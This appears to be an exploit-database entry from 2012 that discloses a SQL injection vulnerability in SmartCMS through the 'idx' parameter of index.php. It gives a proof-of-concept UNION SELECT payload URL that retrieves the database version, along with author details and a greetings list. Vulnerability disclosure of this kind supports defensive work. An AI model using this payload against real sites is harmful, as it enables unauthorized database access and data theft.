SmartCMS - 'index.php?idx' SQL Injection



EKU-ID: 28399 CVE: OSVDB-87871 OSVDB-ID:
Author: NoGe Published: 2012-11-26 Verified: Verified
Download:

Rating

☆☆☆☆☆
Home 


=============================================================================================================

  [o] SmartCMS <= SQL Injection Vulnerability

       Software : SmartMS
       Vendor   : http://smartcms.nl/
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Blog     : http://evilc0de.blogspot.com/

=============================================================================================================

  [o] Exploit

       http://localhost/[path]/index.php?idx=[SQLi]


  [o] PoC

       http://localhost/[path]/index.php?idx=123+AND+1=2+UNION+ALL+SELECT+version()--

=============================================================================================================

  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{

=============================================================================================================

  [o] November 26 2012 - Papua, Indonesia